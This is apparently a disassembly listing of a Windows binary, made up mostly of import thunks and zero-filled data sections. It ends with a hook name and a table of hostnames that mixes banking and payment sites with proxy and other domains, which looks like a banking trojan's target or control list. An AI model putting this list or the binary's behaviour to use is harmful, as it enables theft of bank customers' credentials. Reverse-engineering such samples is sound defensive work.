; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079B4 proc near ; CODE XREF: sub_405AAC+10�p
; sub_406344+9A�p
jmp ds:dword_42639C
sub_4079B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079C0 proc near ; CODE XREF: sub_401EAF+1C�p
; sub_403BC5+EE�p ...
jmp ds:dword_4263A0
sub_4079C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079CC proc near ; CODE XREF: sub_402B0D+34�p
; sub_406344+86�p
jmp ds:dword_4263A4
sub_4079CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079D8 proc near ; CODE XREF: sub_4026EE+57�p
jmp ds:dword_4263A8
sub_4079D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079E4 proc near ; CODE XREF: sub_402B0D+A5�p
; sub_405AAC+633�p ...
jmp ds:dword_4263AC
sub_4079E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079F0 proc near ; CODE XREF: sub_4024E0+33�p
; sub_402613+1E�p ...
jmp ds:dword_4263B0
sub_4079F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079FC proc near ; CODE XREF: sub_40251A+54�p
; .text:004026E4�p
jmp ds:dword_4263B4
sub_4079FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A08 proc near ; CODE XREF: sub_40251A+34�p
; .text:004026C4�p
jmp ds:dword_4263B8
sub_407A08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A14 proc near ; CODE XREF: sub_401EAF+18E�p
jmp ds:dword_4263BC
sub_407A14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A20 proc near ; CODE XREF: sub_403D8E+290�p
; sub_406344+1A8�p
jmp ds:dword_4263C0
sub_407A20 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A2C proc near ; CODE XREF: sub_403D8E+1C�p
jmp ds:dword_4263C4
sub_407A2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A38 proc near ; CODE XREF: sub_401EAF+164�p
jmp ds:dword_4263C8
sub_407A38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A44 proc near ; CODE XREF: sub_401EAF+3D6�p
jmp ds:dword_4263CC
sub_407A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A50 proc near ; CODE XREF: sub_401EAF+8B�p
jmp ds:dword_4263D0
sub_407A50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A5C proc near ; CODE XREF: sub_4014E2+49�p
; sub_4033E8+38�p ...
jmp ds:dword_4263D4
sub_407A5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A68 proc near ; CODE XREF: sub_4033E8+61�p
; sub_403659+4D�p ...
jmp ds:dword_4263D8
sub_407A68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A74 proc near ; CODE XREF: sub_406316+11�p
jmp ds:dword_4263DC
sub_407A74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A80 proc near ; CODE XREF: sub_4033E8+15�p
jmp ds:dword_4263E0
sub_407A80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A8C proc near ; CODE XREF: sub_40129C+23�p
; sub_4014E2+1D�p ...
jmp ds:dword_4263E4
sub_407A8C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407A98 proc near ; CODE XREF: sub_40129C+49�p
; sub_4014E2+6C�p
jmp ds:dword_4263E8
sub_407A98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AA4 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_4263EC
sub_407AA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AB0 proc near ; CODE XREF: sub_401EAF+326�p
; sub_405350:loc_405390�p
jmp ds:dword_4263F0
sub_407AB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407ABC proc near ; CODE XREF: sub_403459+31�p
; sub_404FCE+182�p ...
jmp ds:dword_4263F4
sub_407ABC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AC8 proc near ; CODE XREF: sub_40519A+97�p
jmp ds:dword_4263F8
sub_407AC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AD4 proc near ; CODE XREF: sub_406344+2F5�p
jmp ds:dword_4263FC
sub_407AD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AE0 proc near ; CODE XREF: sub_403D8E+20F�p
; sub_403D8E+232�p
jmp ds:dword_426400
sub_407AE0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AEC proc near ; CODE XREF: sub_40409C+61�p
jmp ds:dword_426404
sub_407AEC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407AF8 proc near ; CODE XREF: sub_40530C+F�p
jmp ds:dword_426408
sub_407AF8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B04 proc near ; CODE XREF: sub_405322+D�p
jmp ds:dword_42640C
sub_407B04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B10 proc near ; CODE XREF: sub_401EAF+346�p
jmp ds:dword_426410
sub_407B10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B1C proc near ; CODE XREF: sub_403D8E+1B3�p
jmp ds:dword_426414
sub_407B1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B28 proc near ; CODE XREF: sub_404117+24�p
jmp ds:dword_426418
sub_407B28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B34 proc near ; CODE XREF: sub_402784+BE�p
; sub_402B0D+19B�p ...
jmp ds:dword_42641C
sub_407B34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B40 proc near ; CODE XREF: sub_402784+70�p
; sub_40284A+1E1�p ...
jmp ds:dword_426420
sub_407B40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B4C proc near ; CODE XREF: sub_401565+62�p
; sub_4035B2+D�p ...
jmp ds:dword_426424
sub_407B4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B58 proc near ; CODE XREF: sub_404117+D�p
jmp ds:dword_426428
sub_407B58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B64 proc near ; CODE XREF: sub_404F53+1E�p
; sub_406344+45D�p
jmp ds:dword_42642C
sub_407B64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B70 proc near ; CODE XREF: sub_402B0D+F5�p
; sub_403D8E+2AD�p ...
jmp ds:dword_426430
sub_407B70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B7C proc near ; CODE XREF: sub_403D8E+244�p
; sub_404211+63�p ...
jmp ds:dword_42643C
sub_407B7C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B88 proc near ; CODE XREF: sub_40553F+3D�p
; sub_4068A8+99�p ...
jmp ds:dword_426440
sub_407B88 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407B94 proc near ; CODE XREF: sub_403D8E+1FF�p
jmp ds:dword_426444
sub_407B94 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BA0 proc near ; CODE XREF: sub_4054DD+13�p
; sub_4054DD+56�p
jmp ds:dword_426448
sub_407BA0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BAC proc near ; CODE XREF: sub_4054DD+2F�p
jmp ds:dword_42644C
sub_407BAC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BB8 proc near ; CODE XREF: sub_40553F+564�p
; sub_4067EE+27�p ...
jmp ds:dword_426450
sub_407BB8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BC4 proc near ; CODE XREF: sub_4043B0+4C�p
jmp ds:dword_426454
sub_407BC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BD0 proc near ; CODE XREF: sub_406344+280�p
jmp ds:dword_426458
sub_407BD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BDC proc near ; CODE XREF: sub_406344+28F�p
jmp ds:dword_42645C
sub_407BDC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BE8 proc near ; CODE XREF: sub_406344+477�p
jmp ds:dword_426460
sub_407BE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407BF4 proc near ; CODE XREF: sub_406344+2B8�p
jmp ds:dword_426464
sub_407BF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C00 proc near ; CODE XREF: sub_4068A8+262�p
; sub_4068A8+2C4�p ...
jmp ds:dword_426468
sub_407C00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C0C proc near ; CODE XREF: sub_406344+49A�p
jmp ds:dword_42646C
sub_407C0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C18 proc near ; CODE XREF: sub_40553F+4D6�p
; sub_40553F+4FA�p ...
jmp ds:dword_426470
sub_407C18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C24 proc near ; CODE XREF: sub_40553F+4ED�p
; sub_40553F+511�p ...
jmp ds:dword_426474
sub_407C24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C30 proc near ; CODE XREF: sub_402CB2+3E�p
jmp ds:dword_426478
sub_407C30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C3C proc near ; CODE XREF: sub_402CB2+56�p
jmp ds:dword_42647C
sub_407C3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C48 proc near ; CODE XREF: sub_402CB2+15�p
jmp ds:dword_426480
sub_407C48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C54 proc near ; CODE XREF: sub_406344+482�p
jmp ds:dword_426484
sub_407C54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C60 proc near ; CODE XREF: sub_406344+48B�p
jmp ds:dword_426488
sub_407C60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C6C proc near ; CODE XREF: sub_40553F+13A�p
; sub_40553F+1DD�p ...
jmp ds:dword_42648C
sub_407C6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C78 proc near ; CODE XREF: sub_4032E2+3E�p
; sub_4032E2+8E�p ...
jmp ds:dword_426490
sub_407C78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C84 proc near ; CODE XREF: sub_4068A8+15B�p
jmp ds:dword_426494
sub_407C84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C90 proc near ; CODE XREF: sub_40553F+30�p
; sub_4068A8+578�p
jmp ds:dword_426498
sub_407C90 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407C9C proc near ; CODE XREF: sub_40553F+7F�p
; sub_40553F+BB�p ...
jmp ds:dword_42649C
sub_407C9C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CA8 proc near ; CODE XREF: sub_4068A8+176�p
; sub_4068A8+4E9�p
jmp ds:dword_4264A0
sub_407CA8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CB4 proc near ; CODE XREF: sub_4068A8+11C�p
jmp ds:dword_4264A4
sub_407CB4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CC0 proc near ; CODE XREF: sub_4068A8+58B�p
jmp ds:dword_4264A8
sub_407CC0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CCC proc near ; CODE XREF: sub_4067EE+AE�p
jmp ds:dword_4264AC
sub_407CCC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CD8 proc near ; CODE XREF: sub_406344+29D�p
jmp ds:dword_4264B8
sub_407CD8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CE4 proc near ; CODE XREF: sub_4068A8+1F4�p
jmp ds:dword_4264BC
sub_407CE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CF0 proc near ; CODE XREF: sub_4068A8+1DB�p
; sub_4068A8+1E7�p
jmp ds:dword_4264C0
sub_407CF0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407CFC proc near ; CODE XREF: sub_4068A8+20E�p
jmp ds:dword_4264C4
sub_407CFC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D08 proc near ; CODE XREF: sub_40553F+128�p
; sub_40553F+447�p
jmp ds:dword_4264C8
sub_407D08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D14 proc near ; CODE XREF: sub_4033E8+26�p
jmp ds:dword_4264D4
sub_407D14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D20 proc near ; CODE XREF: sub_4033E8+4E�p
jmp ds:dword_4264D8
sub_407D20 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D2C proc near ; CODE XREF: sub_401379+21�p
; sub_402AAB+2F�p
jmp ds:dword_4264DC
sub_407D2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D38 proc near ; CODE XREF: sub_401326+40�p
; sub_401379+4B�p ...
jmp ds:dword_4264E0
sub_407D38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D44 proc near ; CODE XREF: sub_401326+16�p
jmp ds:dword_4264E4
sub_407D44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D50 proc near ; CODE XREF: sub_401326+36�p
jmp ds:dword_4264E8
sub_407D50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D5C proc near ; CODE XREF: sub_401379+41�p
; sub_402AAB+51�p
jmp ds:dword_4264EC
sub_407D5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D68 proc near ; CODE XREF: sub_401A00+9D�p
jmp ds:dword_4264F0
sub_407D68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D74 proc near ; CODE XREF: sub_401A00+C4�p
jmp ds:dword_4264F4
sub_407D74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D80 proc near ; CODE XREF: sub_401A00+AF�p
jmp ds:dword_4264F8
sub_407D80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D8C proc near ; CODE XREF: sub_4032E2+F�p
jmp ds:dword_4264FC
sub_407D8C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407D98 proc near ; CODE XREF: sub_4032E2+DE�p
jmp ds:dword_426500
sub_407D98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DA4 proc near ; CODE XREF: sub_4032E2+19�p
jmp ds:dword_426504
sub_407DA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DB0 proc near ; CODE XREF: sub_402578+15�p
jmp ds:dword_426510
sub_407DB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DBC proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_426514
sub_407DBC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DC8 proc near ; CODE XREF: sub_404211+E7�p
; sub_4043B0+47�p ...
jmp ds:dword_426518
sub_407DC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DD4 proc near ; CODE XREF: sub_4034AD+93�p
; sub_4034AD+DF�p
jmp ds:dword_42651C
sub_407DD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DE0 proc near ; CODE XREF: sub_405AAC+7A1�p
; sub_405AAC+7BE�p
jmp ds:dword_426520
sub_407DE0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DEC proc near ; CODE XREF: sub_401219+74�p
; sub_405AAC+75B�p ...
jmp ds:dword_426524
sub_407DEC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407DF8 proc near ; CODE XREF: sub_405350+A2�p
jmp ds:dword_426528
sub_407DF8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E04 proc near ; CODE XREF: sub_401565+1E�p
; .text:00404FBE�p ...
jmp ds:dword_42652C
sub_407E04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E10 proc near ; CODE XREF: sub_403D8E+32�p
; sub_403D8E+13A�p ...
jmp ds:dword_426530
sub_407E10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E1C proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_426534
sub_407E1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E28 proc near ; CODE XREF: sub_4013E4:loc_4013F1�p
; sub_40284A+C�p ...
jmp ds:dword_426538
sub_407E28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E34 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_42653C
sub_407E34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E40 proc near ; CODE XREF: sub_402638+13�p
; .text:00402695�p ...
jmp ds:dword_426540
sub_407E40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E4C proc near ; CODE XREF: sub_405AAC+16�p
; sub_406344+A0�p
jmp ds:dword_426544
sub_407E4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E58 proc near ; CODE XREF: sub_405AAC+5A5�p
jmp ds:dword_426548
sub_407E58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E64 proc near ; CODE XREF: sub_4024E0+24�p
; sub_40251A+25�p ...
jmp ds:dword_42654C
sub_407E64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E70 proc near ; CODE XREF: sub_407868+17�p
jmp ds:dword_426550
sub_407E70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407E7C proc near ; CODE XREF: sub_403D8E+2C8�p
jmp ds:dword_426554
sub_407E7C endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00011378 ( 70520.)
; Section size in file : 00011378 ( 70520.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 408000h
dword_408000 dd 0 ; sub_4067EE+8B�r ...
dword_408004 dd 0 ; sub_4015EC+3A9�w ...
align 10h
dword_408010 dd 40h dup(0) ; sub_405AAC+3C0�o ...
dword_408110 dd 0 ; sub_4015EC+1DA�w ...
dword_408114 dd 0 ; sub_4015EC+34F�r ...
dword_408118 dd 0 ; sub_404DE5+1A�r ...
byte_40811C db 0 ; DATA XREF: sub_4015EC+FB�w
align 10h
dword_408120 dd 40h dup(0) ; sub_406344+21E�o ...
dword_408220 dd 0 ; sub_401EAF+CB�w ...
dd 0FEh dup(0)
dword_40861C dd 0 ; sub_40553F+473�r ...
dword_408620 dd 0 dd 0FEh dup(0)
dword_408A1C dd 0 ; sub_4067EE+99�r
dword_408A20 dd 0 ; sub_40553F+4A3�r ...
align 8
byte_408A28 db 0 ; DATA XREF: sub_4015EC+357�w
align 10h
byte_408A30 db 0 ; DATA XREF: sub_4015EC+47�w
; sub_4015EC+4C�r ...
align 4
dword_408A34 dd 0 ; sub_4015EC+184�w ...
align 10h
dword_408A40 dd 40h dup(0) ; sub_405AAC+53C�o ...
dword_408B40 dd 0 ; sub_401EAF+B9�r ...
dd 0FFh dup(0)
dword_408F40 dd 0 ; sub_406344+81�o
align 10h
dword_408F50 dd 0 dd 20h dup(0)
byte_408FD4 db 0 ; DATA XREF: sub_4015EC+31E�w
; sub_4015EC+323�r
align 4
dword_408FD8 dd 0 ; sub_4015EC+B3�r ...
dword_408FDC dd 0 dword_408FE0 dd 0 ; sub_401A00+82�r ...
dword_408FE4 dd 0 ; sub_406344+471�r ...
dword_408FE8 dd 0 ; sub_40553F+134�r
dword_408FEC dd 0 ; sub_4068A8+572�r
dword_408FF0 dd 0 ; sub_401B2E+8�r
dword_408FF4 dd 0 ; sub_4015EC:loc_401659�w ...
dword_408FF8 dd 0 ; sub_40553F+483�r ...
dword_408FFC dd 0 ; sub_4067EE+7D�r
dword_409000 dd 0 ; sub_40553F+20C�r ...
dword_409004 dd 0 ; sub_401AE9+3A�r
dword_409008 dd 0 ; sub_40553F+8B�r ...
dword_40900C dd 0 ; sub_4015EC+8F�w ...
dword_409010 dd 0 ; sub_4067EE+6F�r
align 10h
dword_409020 dd 40h dup(0) ; sub_406344+205�o ...
byte_409120 db 0 ; DATA XREF: sub_4015EC+13D�w
align 4
dword_409124 dd 0 ; sub_40553F+CF�r ...
align 10h
byte_409130 db 0 ; DATA XREF: sub_4043B0+CA�o
; sub_404BA0+5B�o ...
byte_409131 db 0 ; DATA XREF: sub_404BA0+176�r
byte_409132 db 0 ; DATA XREF: sub_404BA0+17F�r
byte_409133 db 0 ; DATA XREF: sub_404BA0+188�r
dd 3FFFh dup(0)
byte_419130 db 0 ; DATA XREF: sub_4015EC+223�w
; sub_4015EC+228�r
align 4
dword_419134 dd 0 ; .text:loc_404F92�r ...
dword_419138 dd 0 dword_41913C dd 0 ; sub_401A00+11�r
dword_419140 dd 0 ; sub_40553F+149�r ...
byte_419144 db 0 ; DATA XREF: sub_4015EC+2A0�w
; sub_4015EC+2A5�r ...
align 4
dword_419148 dd 0 ; sub_40553F+493�r ...
dword_41914C dd 0 ; sub_4068A8+1A9�r ...
dword_419150 dd 0 ; sub_40553F+1D7�r ...
align 10h
dword_419160 dd 40h dup(0) ; sub_40284A+180�o ...
byte_419260 db 0 ; DATA XREF: sub_40129C+58�o
; sub_404FCE+CD�w ...
align 4
dd 3Fh dup(0)
dword_419360 dd 0 ; sub_40553F+4B3�r ...
dword_419364 dd 0 ; sub_40553F+4C3�r
dword_419368 dd 0 ; sub_4068A8+1B1�r ...
align 10h
byte_419370 db 0 ; DATA XREF: sub_4015EC+385�w
align 8
_bss ends
; Section 3. (virtual address 0001A000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41A000h
dd offset dword_408000
dd 419378h, 8000h, 0
dword_41A010 dd 8 ; sub_40109A+110�w ...
dword_41A014 dd 0 dd 0
dword_41A01C dd 0 dword_41A020 dd 0 ; sub_401219+5A�r
dword_41A024 dd 0 ; sub_401219+54�r
dword_41A028 dd 0 ; sub_401219+4E�r
dword_41A02C dd 0 ; sub_40109A:loc_401208�r
dword_41A030 dd 0 dword_41A034 dd 0 ; sub_40109A+87�r ...
dword_41A038 dd 0 dword_41A03C dd 14h dup(0) ; sub_40109A+8F�o
dword_41A08C dd 12FCACh dword_41A090 dd 12FCC4h ; sub_40109A+32�w
aKkqhook_28 db 'KKQHOOK_28',0 ; DATA XREF: sub_406316+5�o
; sub_406344+2EC�o
align 10h
dword_41A0A0 dd 0 ; sub_405AAC+78�r ...
dword_41A0A4 dd 46h ; sub_405AAC+7D6�r ...
off_41A0A8 dd offset aSiliconfirewar ; DATA XREF: sub_405AAC+59�r
; sub_405AAC+7E�r
; "siliconfireware.ru"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
